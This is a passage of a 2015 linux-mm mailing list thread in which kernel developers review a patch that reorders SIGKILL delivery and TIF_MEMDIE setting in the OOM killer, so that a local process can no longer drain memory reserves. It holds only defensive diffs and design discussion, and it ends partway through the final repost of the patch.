> @@ -560,6 +560,7 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>                 K(get_mm_counter(victim->mm, MM_ANONPAGES)),
>                 K(get_mm_counter(victim->mm, MM_FILEPAGES)));
>         task_unlock(victim);
> +       do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> 
>         /*
>          * Kill all user processes sharing victim->mm in other thread groups, if
> @@ -585,7 +586,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>                 }
>         rcu_read_unlock();
> 
> -       do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
>         put_task_struct(victim);
>  }
>  #undef K
> 
> then yes I still can trigger the issue under very limited condition (i.e.
> ran as root user for polling kernel messages with realtime priority, after
> killing all processes using SysRq-i).

Yes, that's why I also said that preempt_{enable,disable} around could
be used:

diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 1ecc0bcaecc5..331c8ac23cc6 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -542,8 +542,15 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	}
 	read_unlock(&tasklist_lock);
 
+	/*
+	 * Make sure that nobody will preempt us between the victim gets access
+	 * to memory reserves and it gets killed. It could depleat the memory
+	 * reserves otherwise.
+	 */
+	preempt_disable();
 	p = find_lock_task_mm(victim);
 	if (!p) {
+		preempt_enable();
 		put_task_struct(victim);
 		return;
 	} else if (victim != p) {
@@ -560,6 +567,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
 		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
 	task_unlock(victim);
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
+	preempt_enable();
 
 	/*
 	 * Kill all user processes sharing victim->mm in other thread groups, if
@@ -585,7 +594,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 		}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	put_task_struct(victim);
 }
 #undef K

[...]

> > The code would be easier then and the race window much smaller. If we
> > really needed to prevent from preemption then preempt_{enable,disable}
> > aournd the whole task_lock region + do_send_sig_info would be still
> > easier to follow than re-taking task_lock.
> 
> What's wrong with re-taking task_lock? It seems to me that re-taking
> task_lock is more straightforward and easier to follow.

I dunno it looks more awkward to me. You have to re-check the victim->mm
after retaking the lock because situation might have changed while the
lock was dropped. If the mark_oom_victim & do_send_sig_info are in the
same preempt region then nothing like that is needed. But this is
probably a matter of taste. I find the above more readable but let's see
what others think.

-- 
Michal Hocko
SUSE Labs

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-25 14:17     ` Michal Hocko
@ 2015-08-25 14:37       ` Tetsuo Handa
  2015-08-25 15:20         ` Michal Hocko
  0 siblings, 1 reply; 14+ messages in thread
From: Tetsuo Handa @ 2015-08-25 14:37 UTC (permalink / raw)
  To: mhocko; +Cc: rientjes, hannes, linux-mm

Michal Hocko wrote:
> > > The code would be easier then and the race window much smaller. If we
> > > really needed to prevent from preemption then preempt_{enable,disable}
> > > aournd the whole task_lock region + do_send_sig_info would be still
> > > easier to follow than re-taking task_lock.
> > 
> > What's wrong with re-taking task_lock? It seems to me that re-taking
> > task_lock is more straightforward and easier to follow.
> 
> I dunno it looks more awkward to me. You have to re-check the victim->mm
> after retaking the lock because situation might have changed while the
> lock was dropped. If the mark_oom_victim & do_send_sig_info are in the
> same preempt region then nothing like that is needed. But this is
> probably a matter of taste. I find the above more readable but let's see
> what others think.

Disabling preemption does not guarantee that the race window is small enough.

If we set TIF_MEMDIE before sending SIGKILL, long interrupts (an extreme
example is SysRq-t from keyboard which would last many seconds) can step
between. We will spend some percent (the worst case is 100 percent) of memory
reserves for allocations which are not needed for termination.

If we send SIGKILL before settting TIF_MEMDIE, we will spend 0 percent of
memory reserves for allocations which are not needed for termination.

Memory reserves are limited, and thus we don't want to waste some pages.

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-25 14:37       ` Tetsuo Handa
@ 2015-08-25 15:20         ` Michal Hocko
  0 siblings, 0 replies; 14+ messages in thread
From: Michal Hocko @ 2015-08-25 15:20 UTC (permalink / raw)
  To: Tetsuo Handa; +Cc: rientjes, hannes, linux-mm

On Tue 25-08-15 23:37:27, Tetsuo Handa wrote:
> Michal Hocko wrote:
> > > > The code would be easier then and the race window much smaller. If we
> > > > really needed to prevent from preemption then preempt_{enable,disable}
> > > > aournd the whole task_lock region + do_send_sig_info would be still
> > > > easier to follow than re-taking task_lock.
> > > 
> > > What's wrong with re-taking task_lock? It seems to me that re-taking
> > > task_lock is more straightforward and easier to follow.
> > 
> > I dunno it looks more awkward to me. You have to re-check the victim->mm
> > after retaking the lock because situation might have changed while the
> > lock was dropped. If the mark_oom_victim & do_send_sig_info are in the
> > same preempt region then nothing like that is needed. But this is
> > probably a matter of taste. I find the above more readable but let's see
> > what others think.
> 
> Disabling preemption does not guarantee that the race window is small enough.
> 
> If we set TIF_MEMDIE before sending SIGKILL, long interrupts (an extreme
> example is SysRq-t from keyboard which would last many seconds) can step
> between. We will spend some percent (the worst case is 100 percent) of memory
> reserves for allocations which are not needed for termination.

I wouldn't be worried about sysrq+t because that requires the
administrator. And IRQs shouldn't take too long normally. But I guess
you are right that this will be inherently less fragile long term. All
other callers of mark_oom_victim except for lowmem_scan are safe. Could
you update the lmk as well please?

-- 
Michal Hocko
SUSE Labs

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-23  7:19 [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL Tetsuo Handa
  2015-08-24  9:47 ` Michal Hocko
@ 2015-08-26 14:12 ` Michal Hocko
  2015-08-26 14:28   ` Oleg Nesterov
  2015-08-26 15:03 ` Tetsuo Handa
  2 siblings, 1 reply; 14+ messages in thread
From: Michal Hocko @ 2015-08-26 14:12 UTC (permalink / raw)
  To: Oleg Nesterov; +Cc: Tetsuo Handa, rientjes, hannes, linux-mm

Hi Oleg,

On Sun 23-08-15 16:19:38, Tetsuo Handa wrote:
[...]
> diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> index 5249e7e..c0a5a69 100644
> --- a/mm/oom_kill.c
> +++ b/mm/oom_kill.c
> @@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  	/* Get a reference to safely compare mm after task_unlock(victim) */
>  	mm = victim->mm;
>  	atomic_inc(&mm->mm_users);
> -	mark_oom_victim(victim);
>  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
>  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
>  		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
>  		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
>  	task_unlock(victim);
> +	/* Send SIGKILL before setting TIF_MEMDIE. */
> +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> +	task_lock(victim);
> +	if (victim->mm)
> +		mark_oom_victim(victim);
> +	task_unlock(victim);

I cannot seem to find any explicit note about task_lock vs. signal
nesting nor task_lock() anywhere in kernel/signal.c so I rather ask. Can
we call do_send_sig_info with task_lock held?

Thanks!
-- 
Michal Hocko
SUSE Labs

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-26 14:12 ` Michal Hocko
@ 2015-08-26 14:28   ` Oleg Nesterov
  2015-08-27  8:38     ` Michal Hocko
  0 siblings, 1 reply; 14+ messages in thread
From: Oleg Nesterov @ 2015-08-26 14:28 UTC (permalink / raw)
  To: Michal Hocko; +Cc: Tetsuo Handa, rientjes, hannes, linux-mm

Hi Michal,

On 08/26, Michal Hocko wrote:
>
> I cannot seem to find any explicit note about task_lock vs. signal
> nesting nor task_lock() anywhere in kernel/signal.c so I rather ask. Can
> we call do_send_sig_info with task_lock held?

Yes.

Simply because task_lock() doesn't disable irqs and (unfortunately ;)
we do send the signals from interrupts.

Oleg.

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-23  7:19 [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL Tetsuo Handa
  2015-08-24  9:47 ` Michal Hocko
  2015-08-26 14:12 ` Michal Hocko
@ 2015-08-26 15:03 ` Tetsuo Handa
  2015-08-27  8:40   ` Michal Hocko
  2 siblings, 1 reply; 14+ messages in thread
From: Tetsuo Handa @ 2015-08-26 15:03 UTC (permalink / raw)
  To: mhocko, rientjes, hannes; +Cc: linux-mm

Reposting updated version as it turned out that we can call do_send_sig_info()
with task_lock held. ;-) ( http://marc.info/?l=linux-mm&m=144059948628905&w=2 )
----------------------------------------
>From 69489b37171d9a84ccbb00e7441f8f73bc526e11 Mon Sep 17 00:00:00 2001
From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Date: Wed, 26 Aug 2015 23:54:12 +0900
Subject: [PATCH] mm,oom: Reverse the order of setting TIF_MEMDIE and sending
 SIGKILL.

It is observed that a multi-threaded program can deplete memory reserves
using time lag between the OOM killer sets TIF_MEMDIE and the OOM killer
sends SIGKILL. This is because a thread group leader who gets TIF_MEMDIE
received SIGKILL too lately when there is a lot of child threads sharing
the same memory due to doing a lot of printk() inside for_each_process()
loop which can take many seconds.

Before starting oom-depleter process:

    Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
    Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB

As of invoking the OOM killer:

    Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
    Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB

Between the thread group leader got TIF_MEMDIE and receives SIGKILL:

    Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
    Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB

The oom-depleter's thread group leader which got TIF_MEMDIE started
memset() in user space after the OOM killer set TIF_MEMDIE, and it
was free to abuse ALLOC_NO_WATERMARKS by TIF_MEMDIE for memset()
in user space until SIGKILL is delivered. If SIGKILL is delivered
before TIF_MEMDIE is set, the oom-depleter can terminate without
touching memory reserves.

Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
---
 mm/oom_kill.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 5249e7e..408aa8e 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -555,6 +555,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	/* Get a reference to safely compare mm after task_unlock(victim) */
 	mm = victim->mm;
 	atomic_inc(&mm->mm_users);
+	/* Send SIGKILL before setting TIF_MEMDIE. */
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mark_oom_victim(victim);
 	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
 		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
@@ -586,7 +588,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 		}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mmput(mm);
 	put_task_struct(victim);
 }
-- 
1.8.3.1

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-26 14:28   ` Oleg Nesterov
@ 2015-08-27  8:38     ` Michal Hocko
  0 siblings, 0 replies; 14+ messages in thread
From: Michal Hocko @ 2015-08-27  8:38 UTC (permalink / raw)
  To: Oleg Nesterov; +Cc: Tetsuo Handa, rientjes, hannes, linux-mm

On Wed 26-08-15 16:28:52, Oleg Nesterov wrote:
> Hi Michal,
> 
> On 08/26, Michal Hocko wrote:
> >
> > I cannot seem to find any explicit note about task_lock vs. signal
> > nesting nor task_lock() anywhere in kernel/signal.c so I rather ask. Can
> > we call do_send_sig_info with task_lock held?
> 
> Yes.
> 
> Simply because task_lock() doesn't disable irqs and (unfortunately ;)
> we do send the signals from interrupts.

Good point. Thanks!
-- 
Michal Hocko
SUSE Labs

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-26 15:03 ` Tetsuo Handa
@ 2015-08-27  8:40   ` Michal Hocko
  2015-08-27 11:11     ` Tetsuo Handa
  0 siblings, 1 reply; 14+ messages in thread
From: Michal Hocko @ 2015-08-27  8:40 UTC (permalink / raw)
  To: Tetsuo Handa; +Cc: rientjes, hannes, linux-mm

On Thu 27-08-15 00:03:13, Tetsuo Handa wrote:
> Reposting updated version as it turned out that we can call do_send_sig_info()
> with task_lock held. ;-) ( http://marc.info/?l=linux-mm&m=144059948628905&w=2 )
> ----------------------------------------
> >From 69489b37171d9a84ccbb00e7441f8f73bc526e11 Mon Sep 17 00:00:00 2001
> From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
> Date: Wed, 26 Aug 2015 23:54:12 +0900
> Subject: [PATCH] mm,oom: Reverse the order of setting TIF_MEMDIE and sending
>  SIGKILL.
> 
> It is observed that a multi-threaded program can deplete memory reserves
> using time lag between the OOM killer sets TIF_MEMDIE and the OOM killer
> sends SIGKILL. This is because a thread group leader who gets TIF_MEMDIE
> received SIGKILL too lately when there is a lot of child threads sharing
> the same memory due to doing a lot of printk() inside for_each_process()
> loop which can take many seconds.
> 
> Before starting oom-depleter process:
> 
>     Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
>     Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
> 
> As of invoking the OOM killer:
> 
>     Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
>     Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
> 
> Between the thread group leader got TIF_MEMDIE and receives SIGKILL:
> 
>     Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
>     Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
> 
> The oom-depleter's thread group leader which got TIF_MEMDIE started
> memset() in user space after the OOM killer set TIF_MEMDIE, and it
> was free to abuse ALLOC_NO_WATERMARKS by TIF_MEMDIE for memset()
> in user space until SIGKILL is delivered. If SIGKILL is delivered
> before TIF_MEMDIE is set, the oom-depleter can terminate without
> touching memory reserves.

The comment could have been a bit better because it doesn't exmplain
why but this is much much better.
 
> Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>

Acked-by: Michal Hocko <mhocko@suse.com>

I guess you want to add Andrew to the CC because he might miss it this
way easily.

I would also consider marking this for stable.

Thanks!

> ---
>  mm/oom_kill.c | 3 ++-
>  1 file changed, 2 insertions(+), 1 deletion(-)
> 
> diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> index 5249e7e..408aa8e 100644
> --- a/mm/oom_kill.c
> +++ b/mm/oom_kill.c
> @@ -555,6 +555,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  	/* Get a reference to safely compare mm after task_unlock(victim) */
>  	mm = victim->mm;
>  	atomic_inc(&mm->mm_users);
> +	/* Send SIGKILL before setting TIF_MEMDIE. */
> +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
>  	mark_oom_victim(victim);
>  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
>  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
> @@ -586,7 +588,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  		}
>  	rcu_read_unlock();
>  
> -	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
>  	mmput(mm);
>  	put_task_struct(victim);
>  }
> -- 
> 1.8.3.1

-- 
Michal Hocko
SUSE Labs

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-27  8:40   ` Michal Hocko
@ 2015-08-27 11:11     ` Tetsuo Handa
  2015-08-27 11:34       ` Michal Hocko
  0 siblings, 1 reply; 14+ messages in thread
From: Tetsuo Handa @ 2015-08-27 11:11 UTC (permalink / raw)
  To: mhocko; +Cc: akpm, rientjes, hannes, linux-mm

Michal Hocko wrote:
> The comment could have been a bit better because it doesn't exmplain
> why but this is much much better.
>
> I guess you want to add Andrew to the CC because he might miss it this
> way easily.
> 
> I would also consider marking this for stable.
> 
OK. Here is an updated patch. Can you carry this patch through your git
tree (because this patch depends on previous "[PATCH 1/2] mm,oom: Fix
potentially killing unrelated process.")?
----------
>From e9077d84d9d1e32b91b8e44534dd6fab494bbbe2 Mon Sep 17 00:00:00 2001
From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Date: Thu, 27 Aug 2015 19:26:35 +0900
Subject: [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.

It was confirmed that a local unprivileged user can consume all memory
reserves and hang up that system using time lag between the OOM killer
sets TIF_MEMDIE on an OOM victim and sends SIGKILL to that victim, for
printk() inside for_each_process() loop at oom_kill_process() can consume
many seconds when there are many thread groups sharing the same memory.


Before starting oom-depleter process:

    Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
    Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB

As of invoking the OOM killer:

    Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
    Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB

Between the thread group leader got TIF_MEMDIE and receives SIGKILL:

    Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
    Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB


The oom-depleter's thread group leader which got TIF_MEMDIE started
memset() in user space after the OOM killer set TIF_MEMDIE, and it
was free to abuse ALLOC_NO_WATERMARKS by TIF_MEMDIE for memset()
in user space until SIGKILL is delivered. If SIGKILL is delivered
before TIF_MEMDIE is set, the oom-depleter can terminate without
touching memory reserves.

Although the possibility of hitting this time lag is very small for 3.19
and earlier kernels because TIF_MEMDIE is set immediately before sending
SIGKILL, preemption or long interrupts (an extreme example is SysRq-t)
can step between and allow memory allocations which are not needed for
terminating the OOM victim.

Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Acked-by: Michal Hocko <mhocko@suse.com>
Cc: stable <stable@vger.kernel.org> [4.0+]
Cc: Andrew Morton <akpm@linux-foundation.org>
---
 mm/oom_kill.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 5249e7e..408aa8e 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -555,6 +555,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	/* Get a reference to safely compare mm after task_unlock(victim) */
 	mm = victim->mm;
 	atomic_inc(&mm->mm_users);
+	/* Send SIGKILL before setting TIF_MEMDIE. */
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mark_oom_victim(victim);
 	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
 		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
@@ -586,7 +588,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 		}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mmput(mm);
 	put_task_struct(victim);
 }
-- 
1.8.3.1

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-27 11:11     ` Tetsuo Handa
@ 2015-08-27 11:34       ` Michal Hocko
  2015-08-27 14:03         ` Tetsuo Handa
  0 siblings, 1 reply; 14+ messages in thread
From: Michal Hocko @ 2015-08-27 11:34 UTC (permalink / raw)
  To: Tetsuo Handa; +Cc: akpm, rientjes, hannes, linux-mm

On Thu 27-08-15 20:11:24, Tetsuo Handa wrote:
> Cc: stable <stable@vger.kernel.org> [4.0+]

Please also add
Fixes: 83363b917a29 ("oom: make sure that TIF_MEMDIE is set under
task_lock")
-- 
Michal Hocko
SUSE Labs

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
  2015-08-27 11:34       ` Michal Hocko
@ 2015-08-27 14:03         ` Tetsuo Handa
  0 siblings, 0 replies; 14+ messages in thread
From: Tetsuo Handa @ 2015-08-27 14:03 UTC (permalink / raw)
  To: mhocko; +Cc: akpm, rientjes, hannes, linux-mm

Michal Hocko wrote:
> On Thu 27-08-15 20:11:24, Tetsuo Handa wrote:
> > Cc: stable <stable@vger.kernel.org> [4.0+]
> 
> Please also add
> Fixes: 83363b917a29 ("oom: make sure that TIF_MEMDIE is set under
> task_lock")

I think you can do it like some maintainers do...
------------------------------------------------------------
>From e9077d84d9d1e32b91b8e44534dd6fab494bbbe2 Mon Sep 17 00:00:00 2001
From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Date: Thu, 27 Aug 2015 19:26:35 +0900
Subject: [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.

It was confirmed that a local unprivileged user can consume all memory
reserves and hang up that system using time lag between the OOM killer
sets TIF_MEMDIE on an OOM victim and sends SIGKILL to that victim, for
printk() inside for_each_process() loop at oom_kill_process() can consume
many seconds when there are many thread groups sharing the same memory.


Before starting oom-depleter process:

    Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
    Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB

As of invoking the OOM killer:

    Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
    Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB

Between the thread group leader got TIF_MEMDIE and receives SIGKILL:

    Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
    Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB


The oom-depleter's thread group leader which got TIF_MEMDIE started
memset() in user space after the OOM killer set TIF_MEMDIE, and it
was free to abuse ALLOC_NO_WATERMARKS by TIF_MEMDIE for memset()
in user space until SIGKILL is delivered. If SIGKILL is delivered
before TIF_MEMDIE is set, the oom-depleter can terminate without
touching memory reserves.

Although the possibility of hitting this time lag is very small for 3.19
and earlier kernels because TIF_MEMDIE is set immediately before sending
SIGKILL, preemption or long interrupts (an extreme example is SysRq-t)
can step between and allow memory allocations which are not needed for
terminating the OOM victim.

Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Acked-by: Michal Hocko <mhocko@suse.com>
Cc: stable <stable@vger.kernel.org> [4.0+]
Fixes: 83363b917a29 ("oom: make sure that TIF_MEMDIE is set under task_lock")
Cc: Andrew Morton <akpm@linux-foundation.org>
---
 mm/oom_kill.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 5249e7e..408aa8e 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
